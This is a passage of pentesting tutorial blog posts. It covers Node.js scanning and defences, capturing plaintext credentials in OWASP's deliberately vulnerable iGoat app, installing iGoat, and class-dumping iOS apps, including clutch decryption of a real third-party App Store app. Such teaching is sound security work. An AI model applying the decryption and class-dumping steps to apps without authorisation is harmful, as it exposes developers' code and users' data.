<b>nsp check module-name-to-audited [ </b>This will check vulnerabilities in mention <b>]</b></div>
<div>
<b>Or</b></div>
<div>
<b>nsp check module-name-to-audite.json</b></div>
<div>
<b><br /></b></div>
<div>
<b>6) Automated Scan</b></div>
<div>
<b><br /></b></div>
<div>
We can use <a href="https://github.com/ajinabraham/NodeJsScan" target="_blank">NodeJSScan</a> for automated vulnerability scanning. </div>
<div>
<br /></div>
<div>
<br /></div>
<div style="text-align: center;">
<b>Security Prevention </b></div>
<div style="text-align: center;">
<b><br /></b></div>
<div style="text-align: center;">
<div style="text-align: left;">
<ul style="text-align: left;">
<li>Deploy rate-limit to prevent brute-force attacks against authentication. One way to do this is to use StrongLoop API Gateway to enforce a rate-limiting policy or middleware such as express-limiter.</li>
<li>Use csurf middleware to CSRF Protection.</li>
<li>Always filter and sanitize user input to protect against most of the vulnerabilities like SQLinjection, XSS, Command Injection etc.</li>
<li>Use the nmap and sslyze tools to test the configuration of your SSL.</li>
<li>Use safe-regex to secure regular expression.</li>
<li>Do not expose sensitive information on client side</li>
<li>Perform proper error handling to prevent information disclosure.</li>
<li><strong>Strict-Transport-Security</strong> enforces secure (HTTP over SSL/TLS) connections to the server</li>
<li><strong>X-Frame-Options</strong> provides clickjacking protection</li>
<li><strong>X-XSS-Protection</strong> enables the Cross-site scripting (XSS) filter built into most recent web browsers</li>
<li><strong>X-Content-Type-Options</strong> prevents browsers from MIME-sniffing a response away from the declared content-type</li>
<li><strong>Content-Security-Policy</strong> prevents a wide range of attacks, including Cross-site scripting and other cross-site injections</li>
</ul>
</div>
</div>
<div>
<b><br /></b></div>
<div>
</div>
<div>
<b>This is all about Pentesting Node.js Application : Nodejs Application Security. If you find this post good. Please do like & share.</b><br />
<b>Thanks.</b></div>
<div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<br /></div>
</div>
<div style="font-weight: bold;">
<b><br /></b></div>
</div>
</div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com8tag:blogger.com,1999:blog-3462277729309057123.post-23085247891234279482017-04-23T11:14:00.000+05:302017-04-23T11:16:31.525+05:30iOS Application Pentesting Part 5 : Insecure HTTP Data Transit <div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3wfSM7A_-5EXh6PCH1-0KrNsadI9exwLYh9hyH24qt8YBLaXg-Bm7pLiRVoXjNyA6ew4GqnKc5WDIInEyPKUMXsuCqogz3gPjjGe6o_iMFfQygxpLlz3SrvuusGjc6SSK7QUl0eBNEt4/s1600/http-insecure.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3wfSM7A_-5EXh6PCH1-0KrNsadI9exwLYh9hyH24qt8YBLaXg-Bm7pLiRVoXjNyA6ew4GqnKc5WDIInEyPKUMXsuCqogz3gPjjGe6o_iMFfQygxpLlz3SrvuusGjc6SSK7QUl0eBNEt4/s640/http-insecure.jpg" width="640" /></a></div>
<br />
<br />
Just like <a href="https://www.owasp.org/index.php/Testing_for_Sensitive_information_sent_via_unencrypted_channels_(OTG-CRYPST-003)#Example_2:_Form-Based_Authentication_Performed_over_HTTP" target="_blank">Transmitting Sensitive Credentials Over HTTP</a>, Application which used HTTP to communicate with their server and don`t using any kind of encryption are vulnerable to this issues.<br />
<br />
In iGoat application, there is a simple demonstration that username & password passed in application is transmitting over http and without any encryption as result an attacker can capture/sniff those packages and could hijack victim`s account.<br />
<a name='more'></a><br />
Open the iGoat App and go to <b>Data Protection ( Transit ) </b>and then select <b>Server Communication </b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg71jMlrTK86VJP9E0SwPUnmZ4QtJngsVVcbSbg9fsX1zJVQ_ftLdKUax0Hl-i7tP9ii3aO9THnDWevBz9eQIK4tmIrNnYHY3VbuCFK7orwx8S2QoFzJQCyC0E03v-11i5j2ImZE9n-dHQ/s1600/Screen+Shot+2017-04-22+at+6.14.38+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg71jMlrTK86VJP9E0SwPUnmZ4QtJngsVVcbSbg9fsX1zJVQ_ftLdKUax0Hl-i7tP9ii3aO9THnDWevBz9eQIK4tmIrNnYHY3VbuCFK7orwx8S2QoFzJQCyC0E03v-11i5j2ImZE9n-dHQ/s640/Screen+Shot+2017-04-22+at+6.14.38+PM.png" width="378" /></a></div>
<b><br /></b>
<b><br /></b>
In the other side don`t forget to run the iGoat app ruby server.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikKqRii4vY53fwT-CK31MpqNJIzIRnrg-Bm6pKyU6Z8GRVfQeNaIGTL1KVUG_7v1znyDkTi6-IeLw4ZN9jZ7h2TYkWrNUkqmM53SIj90hZJZ0mXdXDH_9bG_fvwJXkr5-5XVxtfzCxAdg/s1600/Screen+Shot+2017-04-22+at+6.15.02+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="76" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikKqRii4vY53fwT-CK31MpqNJIzIRnrg-Bm6pKyU6Z8GRVfQeNaIGTL1KVUG_7v1znyDkTi6-IeLw4ZN9jZ7h2TYkWrNUkqmM53SIj90hZJZ0mXdXDH_9bG_fvwJXkr5-5XVxtfzCxAdg/s640/Screen+Shot+2017-04-22+at+6.15.02+PM.png" width="640" /></a></div>
<br />
<br />
Now go to the application and enter any credentials and hit submit button. After hitting submit button output would be like this.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA7KY1P4Wcx8JlSSmkiOIvgZs42bvLf9mUjDCstrVqWPZoUUGoMtQM0mI0wRL7EsyVWVnsBYW0-yV7BKcRZrgeHoPDuyrHw0MO0Vpz8Gwx-qozkP0etpFV_k38RRPjiR3-on4w8BxNQYs/s1600/Screen+Shot+2017-04-22+at+6.18.04+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA7KY1P4Wcx8JlSSmkiOIvgZs42bvLf9mUjDCstrVqWPZoUUGoMtQM0mI0wRL7EsyVWVnsBYW0-yV7BKcRZrgeHoPDuyrHw0MO0Vpz8Gwx-qozkP0etpFV_k38RRPjiR3-on4w8BxNQYs/s640/Screen+Shot+2017-04-22+at+6.18.04+PM.png" width="374" /></a></div>
<br />
In the background our ruby iGoat server will act/demonstrate as an attack scenario where user credentials are stolen by attacker as plain text.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_-nauujF2r9gSMpWT_ljKvoiTZBGaoZce_jcLR8IwAFbnqvAnIuMPGajmjbFERXZLuDb9_dPuWDl3fBzYCtm5REIYCgry3rt0sXhNyMGSPbhBeOp_baZfRa3hWc_73xqh96FvCt_jKxE/s1600/Screen+Shot+2017-04-22+at+6.19.56+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_-nauujF2r9gSMpWT_ljKvoiTZBGaoZce_jcLR8IwAFbnqvAnIuMPGajmjbFERXZLuDb9_dPuWDl3fBzYCtm5REIYCgry3rt0sXhNyMGSPbhBeOp_baZfRa3hWc_73xqh96FvCt_jKxE/s640/Screen+Shot+2017-04-22+at+6.19.56+PM.png" width="640" /></a></div>
<br />
<br />
The same you can do, when you are real penetrating engagement . On your device you can set up a burp proxy or you can use Wireshark to demonstrate this vulnerability where you can see the credentials in clear text format.<br />
<a href="http://www.websecgeeks.com/2017/04/ios-application-pentesting-part-5.html" target="_blank"><br /></a>
<a href="http://www.websecgeeks.com/2017/04/ios-application-pentesting-part-5.html" target="_blank"><<Previous Post</a><br />
iOS Application Pentesting Part 4 :<br />
Installing iGoat Application<br />
<br />
<br /></div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-31128898569522539182017-04-16T20:34:00.002+05:302017-04-23T11:15:33.484+05:30iOS Application Pentesting Part 4 : Installing iGoat Application<div dir="ltr" style="text-align: left;" trbidi="on">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgikQlHazuDqsvpx6d9KSjun2lge__eE69sWA66EBgm27ejhdrPaaYMkf0bu2DC-b5a0-RgL9-WRtJTTC-O2kYyJYHe_5wN1P6DtUgqVZJNrQXhCGDvta1c_RWTrl5jMU9jAWDbksg_wao/s1600/Screen+Shot+2017-04-16+at+7.46.02+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgikQlHazuDqsvpx6d9KSjun2lge__eE69sWA66EBgm27ejhdrPaaYMkf0bu2DC-b5a0-RgL9-WRtJTTC-O2kYyJYHe_5wN1P6DtUgqVZJNrQXhCGDvta1c_RWTrl5jMU9jAWDbksg_wao/s640/Screen+Shot+2017-04-16+at+7.46.02+PM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Picture taken from : https://www.owasp.org/index.php/OWASP_iGoat_Project</td></tr>
</tbody></table>
<br />
To perform hands on practice and learning we will use iGoat iOS Application part of OWASP Security Project. You can find their Github page <a href="https://github.com/OWASP/igoat" target="_blank">here</a>. This Mobile Application is designed as vulnerable for Security Professionals and learner to enhanced their Skills over iOS Application Pentesting.<br />
<br />
This project is Maintained by following folks.<br />
Swaroop<br />
masbog<br />
mtesauro<br />
DinisCruz<br />
<br />
Here is the Project Details<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv3liKCgukd1fllG3GO2m_l4ML6iryvBgCEf_FnyzOb6Z6ms692dLtWpphngaNil9kE06lXmnIa9iOZ35-HK_zFniRdPyPNrO50dZJi-668X8i03vhxHV3a8vHwqXq0bfks18mYVM-HcA/s1600/iGoat+v.2.5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv3liKCgukd1fllG3GO2m_l4ML6iryvBgCEf_FnyzOb6Z6ms692dLtWpphngaNil9kE06lXmnIa9iOZ35-HK_zFniRdPyPNrO50dZJi-668X8i03vhxHV3a8vHwqXq0bfks18mYVM-HcA/s640/iGoat+v.2.5.png" width="356" /></a></div>
<br />
<br />
For later practices we will install this application XCode and run it, But i recommended you to use a Physical device while performing pentesting.<br />
<a name='more'></a><br />
1) So first step to download the vulnerable iOS App.<br />
Go to this URL - <a href="https://github.com/OWASP/igoat" target="_blank">https://github.com/OWASP/igoat </a>and Click download as zip right on the page.<br />
<br />
2) Unzip the downloaded file and you will get a folder. <b>igoat-master</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg99s_YSm6bLxtr0uG22ukLzKRW8lKwmOGKQIYt4l-XDgIVuMow36RmQPBKpQcBONdfLYwHT39v-46qZTY2aDx_Sg0JW9aE2FqJGKOJnHcjg3TOyJaj5YRcQInxrgQL40Qct2rFHHZ887s/s1600/Screen+Shot+2017-04-16+at+8.21.11+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg99s_YSm6bLxtr0uG22ukLzKRW8lKwmOGKQIYt4l-XDgIVuMow36RmQPBKpQcBONdfLYwHT39v-46qZTY2aDx_Sg0JW9aE2FqJGKOJnHcjg3TOyJaj5YRcQInxrgQL40Qct2rFHHZ887s/s400/Screen+Shot+2017-04-16+at+8.21.11+PM.png" width="400" /></a></div>
<br />
3) Now go to igoat-master folder then<b> iGoat </b>folder. Here you will find a xcode project file<br />
<b>iGoat.xcodeproj </b>Open this file in xcode<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiS0pvypWVV6n4_NHsZ4xfRz8RMx2ti4z8p329xuPiTwb3_WGdVJs2ZIqyZei6UkLEAO6c7ZJsV0WAd-ef-5hqFH_a0CpgK0KBQKh6Gnm3wyWzS1MTWpcSUFc99vBepHL39foHsFx0sgDI/s1600/Screen+Shot+2017-04-16+at+8.22.53+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiS0pvypWVV6n4_NHsZ4xfRz8RMx2ti4z8p329xuPiTwb3_WGdVJs2ZIqyZei6UkLEAO6c7ZJsV0WAd-ef-5hqFH_a0CpgK0KBQKh6Gnm3wyWzS1MTWpcSUFc99vBepHL39foHsFx0sgDI/s640/Screen+Shot+2017-04-16+at+8.22.53+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
3) Now select the device in top left panel as iphone 5,6 or 7 which you want ;)</div>
<div class="separator" style="clear: both; text-align: left;">
In my case is Iphone6</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw_n6dHNr3hdO0hqo7vQJ53g_pIP0WmTmYmgh1NiL4BF6TeqokmgnND1C7eufvM94bYljnbvSaPeRbfAxcR4cIR7Ae-PbJ_z1C9fPiqzCEa37OUfjuXRvtS-QzvcMitArnSJdL0ehyphenhyphenpLQ/s1600/Screen+Shot+2017-04-16+at+8.24.22+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw_n6dHNr3hdO0hqo7vQJ53g_pIP0WmTmYmgh1NiL4BF6TeqokmgnND1C7eufvM94bYljnbvSaPeRbfAxcR4cIR7Ae-PbJ_z1C9fPiqzCEa37OUfjuXRvtS-QzvcMitArnSJdL0ehyphenhyphenpLQ/s640/Screen+Shot+2017-04-16+at+8.24.22+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
4) Now click on play button before this button, as a result you will see a large screen running our IGoat Application.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigOh7NfUi-WkhTDGZ-ewFiRWzrzgzY7UGeu2-kj5aLWvZXBBKkURyKkwTVWGg0e9tcqb1DfWuIRf-c4fxtvDSFuCupsqZ13Lzl-y0J1KnvACabjJBiCPmSOHiwTU7Vn-3x69YixFqGo6M/s1600/Screen+Shot+2017-04-16+at+8.25.47+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="370" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigOh7NfUi-WkhTDGZ-ewFiRWzrzgzY7UGeu2-kj5aLWvZXBBKkURyKkwTVWGg0e9tcqb1DfWuIRf-c4fxtvDSFuCupsqZ13Lzl-y0J1KnvACabjJBiCPmSOHiwTU7Vn-3x69YixFqGo6M/s640/Screen+Shot+2017-04-16+at+8.25.47+PM.png" width="640" /></a></div>
<br />
<br />
5) On this same screen go to windows menu and choose 50% in scale option.So our application running window will be convenient<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-EBWHtHI-7b0_4LUdBcSp7Ni5xs4nvEs-shQaKu5VUVUzTKyBL1Jc9MgXRNxmg8XmJAGSRDTEt-Q5WDBuv69IkmmTWUuEOL2dOUSL1RQJP5qCabahpRYLfkpvXMeSq4GkBb4MaR9cL-0/s1600/Screen+Shot+2017-04-16+at+8.27.29+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-EBWHtHI-7b0_4LUdBcSp7Ni5xs4nvEs-shQaKu5VUVUzTKyBL1Jc9MgXRNxmg8XmJAGSRDTEt-Q5WDBuv69IkmmTWUuEOL2dOUSL1RQJP5qCabahpRYLfkpvXMeSq4GkBb4MaR9cL-0/s640/Screen+Shot+2017-04-16+at+8.27.29+PM.png" width="640" /></a></div>
<br />
<br />
Looks Great.<br />
<br />
6) Now lets stat our server which will handle request of this application and required for further exercises.<br />
On the same folder <b>igoat-master </b>you will find a folder called <b>server </b>open it. In this folder you will see a ruby file.<br />
<b>Just Run It !</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM1ZpOAzthAxTyKc1kC0KD2vR3791kOa3HlDXwfL3CfbN0BUmtWAHJueyCXp6fZiB3JRBssjh1OxLlfjiHRo8kM-1IoMb8SrDBsFCdb53nI5wS_VgFq7fqTPCkzPticQp4NrYFNswkhB8/s1600/Screen+Shot+2017-04-16+at+8.30.02+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM1ZpOAzthAxTyKc1kC0KD2vR3791kOa3HlDXwfL3CfbN0BUmtWAHJueyCXp6fZiB3JRBssjh1OxLlfjiHRo8kM-1IoMb8SrDBsFCdb53nI5wS_VgFq7fqTPCkzPticQp4NrYFNswkhB8/s640/Screen+Shot+2017-04-16+at+8.30.02+PM.png" width="640" /></a></div>
<b><br /></b>
<b>So All Set Now ! And we are ready to perform our exercise steps.</b><br />
<b><br /></b>
<b><br /></b><br />
<div style="text-align: right;">
<b><a href="http://www.websecgeeks.com/2017/04/ios-application-pentesting-part-5.html" target="_blank">Next Post>></a></b><b><div style="display: inline !important;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
</b></div>
<div style="text-align: right;">
<b><div>
iOS Application Pentesting Part 5 : </div>
<div>
Insecure HTTP Data Transit</div>
</b></div>
<b><br /><a href="http://www.websecgeeks.com/2017/04/ios-application-pentesting-part-3.html" target="_blank"><< Previous Post</a></b><br />
<b>iOS Application Pentesting Part 3 : Extracting iOS App Class Information</b>
<b><br /></b>
</div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-35533434631754952492017-04-13T08:54:00.001+05:302017-04-13T09:54:10.833+05:30iOS Application Pentesting Part 3 : Extracting iOS App Class Information<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF8R8qxMyxXRMX06fBNfSv44SPo28QKCxoS4VQsFSG8-R8qhQGq_vCACNNZyb3-mhz_pGztpzt9sBjSTSalcYWEg-1MndkYMpHaQAqTTRt8I9_USokHbdSxAbFjbNktG0Lob2O5K4IAic/s1600/Screen+Shot+2017-04-12+at+10.18.11+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF8R8qxMyxXRMX06fBNfSv44SPo28QKCxoS4VQsFSG8-R8qhQGq_vCACNNZyb3-mhz_pGztpzt9sBjSTSalcYWEg-1MndkYMpHaQAqTTRt8I9_USokHbdSxAbFjbNktG0Lob2O5K4IAic/s320/Screen+Shot+2017-04-12+at+10.18.11+PM.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKJanrWuUt3UcsqUdxnZg7CvBEkFWoOmJbwmqXn_Ql93v1vlIdjW38FqucNWu5rb8I0Qdx_-OVTpfYBttlHjUaeQ_N0z6N9iXyck09qC4OhtpuaAmDLz9mCYeJ0IecIXzv80CozL4L5Vg/s1600/Screen+Shot+2017-04-12+at+10.15.34+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="34" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKJanrWuUt3UcsqUdxnZg7CvBEkFWoOmJbwmqXn_Ql93v1vlIdjW38FqucNWu5rb8I0Qdx_-OVTpfYBttlHjUaeQ_N0z6N9iXyck09qC4OhtpuaAmDLz9mCYeJ0IecIXzv80CozL4L5Vg/s320/Screen+Shot+2017-04-12+at+10.15.34+PM.png" width="320" /></a></div>
<br />
Every application has his own group of codes which contents lots of information about the functionality and so on. It will always better if we can extract all the possible information about our application which we are going to attack.<br />
<br />
Toady we will see How to Extract Class Information Of iOS Application.<br />
<br />
Apple has made some modification in their security and now days most the app store apps are encrypted which first need to decrypt to extract class information.<br />
<br />
So first we will see class dumping of non-encrypted apps.<br />
<br />
<b>Dumping Class Information Of Pre-Installed Applications</b><br />
We have 2 ways the find the app.<br />
<div style="text-align: left;">
1) <span style="background-color: white; font-family: "menlo";">find / -type d -iname "Dam*.app"</span><br />
<span style="background-color: white; font-family: "menlo";">2) If the app is customly installed using IPA file then his save directory would be Applications/</span><br />
<span style="background-color: white; font-family: "menlo";"><br /></span>
<br />
I am using the command line search for Damm Vulnerable iOS Application which is developed by Prateek Gianchandani.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIwV-0QVH9ppCX9fVTnnjX3HyR5s7aAzHVvw7hOkI-fBGx10NxoPi6yNdh59U1-nrCljwZCo9MF9_KFh7VGLgYhpkh7q3ILz29joVNN9VNWc9Hudti040KfNAhA6FO8RJkVCVVZjUdj1k/s1600/Screen+Shot+2017-04-12+at+10.15.34+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIwV-0QVH9ppCX9fVTnnjX3HyR5s7aAzHVvw7hOkI-fBGx10NxoPi6yNdh59U1-nrCljwZCo9MF9_KFh7VGLgYhpkh7q3ILz29joVNN9VNWc9Hudti040KfNAhA6FO8RJkVCVVZjUdj1k/s640/Screen+Shot+2017-04-12+at+10.15.34+PM.png" width="640" /></a></div>
<a name='more'></a><br />
We found the application locations in /Applications/DamVulnerableIOSApp.app<br />
<br />
Now first get into this folder [DamVulnerableIOSApp] you will see in green color file which is executable file for that app. So we need to use this file name dump class.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXqP98pJyctx9wc94UenUUUaVC0TwmfJ4HzMQG8_aEhdK98dFtZ7qP3yTrNOW65MCVNDLPxXeFoHVNXbPsWC2KjDM27tcBBs7dit1dZCKkFKFt3f4Sv0QMWbfnWIvzaBoRd2ZdcmNKxD4/s1600/Screen+Shot+2017-04-12+at+10.19.59+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="64" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXqP98pJyctx9wc94UenUUUaVC0TwmfJ4HzMQG8_aEhdK98dFtZ7qP3yTrNOW65MCVNDLPxXeFoHVNXbPsWC2KjDM27tcBBs7dit1dZCKkFKFt3f4Sv0QMWbfnWIvzaBoRd2ZdcmNKxD4/s640/Screen+Shot+2017-04-12+at+10.19.59+PM.png" width="640" /></a></div>
<br />
<br />
Now lets extract this app class information.<br />
<br />
class-dump-z DamVulnerableIOSApp.app/DamVulnerableIOSApp<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiL85BWUfK12YRO1g1eNqaofMCGPeMAdL8uHEWDcH-VtmgwN28ZJXnlwfOjQDBCaWqEZZIJhfU8AJF7hcu0pV9jA4_oRwTjjOvT0kmqrQzcB4nPF212AlKO7EeQVQ9iftVO8yGYqjk8Lqk/s1600/Screen+Shot+2017-04-12+at+10.18.11+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="526" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiL85BWUfK12YRO1g1eNqaofMCGPeMAdL8uHEWDcH-VtmgwN28ZJXnlwfOjQDBCaWqEZZIJhfU8AJF7hcu0pV9jA4_oRwTjjOvT0kmqrQzcB4nPF212AlKO7EeQVQ9iftVO8yGYqjk8Lqk/s640/Screen+Shot+2017-04-12+at+10.18.11+PM.png" width="640" /></a></div>
<br />
As we can see we have tons of output, So it is better if we can save this output in a file to analyse further.<br />
To do this, we can use sftp. So using sftp login to your device using <b>sftp root@192.168.0.3</b> and type your root user password.<br />
then <b>sftp /Applications/Appdirectory.app/Appname > outputfilename</b><br />
The file will be downloaded to your home folder if you are using mac and for windows user it will get saved in your Users Profile home folder.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiifbRTtMUYSDffK1Z8heoefs6IaP84yQdv9kGVWpb8cZNE5RGOdPOFbtCxsTEH_moHVo4fWdfTfeh6dYQmhpP5hXCNMsTlqi30r9qumc7NaZo4_jTfPBwJ0rV_NsgU_wO3oo0igPmxpYw/s1600/Screen+Shot+2017-04-13+at+7.57.49+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="374" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiifbRTtMUYSDffK1Z8heoefs6IaP84yQdv9kGVWpb8cZNE5RGOdPOFbtCxsTEH_moHVo4fWdfTfeh6dYQmhpP5hXCNMsTlqi30r9qumc7NaZo4_jTfPBwJ0rV_NsgU_wO3oo0igPmxpYw/s640/Screen+Shot+2017-04-13+at+7.57.49+AM.png" width="640" /></a></div>
<br />
<div>
<br /></div>
Those class information, helps us to understand the flow of the applications and logic.<br />
<br />
<b>Dumping Class Information Of Encrypted Apps</b><br />
<b><br /></b>
As we know that Applications are downloaded from App Store placed in <span style="background-color: white; font-family: "menlo"; font-size: 11px;"> </span><span style="background-color: white; font-family: "menlo"; font-size: 11px;"> </span><span style="font-size: x-small;"><span style="font-family: "menlo";"><span style="font-size: 11px; font-variant-ligatures: no-common-ligatures;">/<b>var/containers/Bundle/Application . </b>Those apps are usually encrypted to avoid information disclosure. Which makes extracting class information and all a very tough task.</span></span></span><br />
<span style="font-size: x-small;"><span style="font-family: "menlo";"><span style="font-size: 11px; font-variant-ligatures: no-common-ligatures;"><br /></span></span></span>
To overcome this issues, we need to use clutch binary and placed this binary into the /usr/bin folder and give this binary full access using <b>chmod +x clutch</b><br />
<b><br /></b>
First i used command <b>clutch -i [</b>This command will extract all installed application with their bundle id.<br />
Ex. application.<Bundle ID><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4gtgc8LNJ9wTgW5l4wpvPp9Z-X6fZJUXL17X56iQpamT3R0Ex-iwTAZ49s4BCXn4w9-DQ1vXgDRL7De7dukeSxaF4_LyQRX4T7k6jz0nHr25v4A4UsmG2ndB_xUnd5uiy0qeUrRxDC9c/s1600/Screen+Shot+2017-04-13+at+8.44.22+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4gtgc8LNJ9wTgW5l4wpvPp9Z-X6fZJUXL17X56iQpamT3R0Ex-iwTAZ49s4BCXn4w9-DQ1vXgDRL7De7dukeSxaF4_LyQRX4T7k6jz0nHr25v4A4UsmG2ndB_xUnd5uiy0qeUrRxDC9c/s640/Screen+Shot+2017-04-13+at+8.44.22+AM.png" width="640" /></a></div>
<br />
In our case, i am using Rediffmail app for the demo. So we have application name as Rediffmail NG and its bundle ID is - <b>com.rediff.com</b><br />
<b><br /></b>
Now use command <b>clutch -b com.rediff.com [ </b>This command will create a new file /var/tmp/clutch/<>/directory.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg0V61YHy9FiCXTgMr6wEsaWFOKZr9JrDMrYZJfXgQBCecRdFQ-RHBua-s_c0mAws2vMyVKUcnBuQ7LEpVFw1JQo_FO9lX7vvKRSVpnB7o4Jb3wwZGl9ryzj0CHfdz4yGHzVHhEnGEOoQ/s1600/Screen+Shot+2017-04-13+at+8.47.41+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="98" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg0V61YHy9FiCXTgMr6wEsaWFOKZr9JrDMrYZJfXgQBCecRdFQ-RHBua-s_c0mAws2vMyVKUcnBuQ7LEpVFw1JQo_FO9lX7vvKRSVpnB7o4Jb3wwZGl9ryzj0CHfdz4yGHzVHhEnGEOoQ/s640/Screen+Shot+2017-04-13+at+8.47.41+AM.png" width="640" /></a></div>
<br />
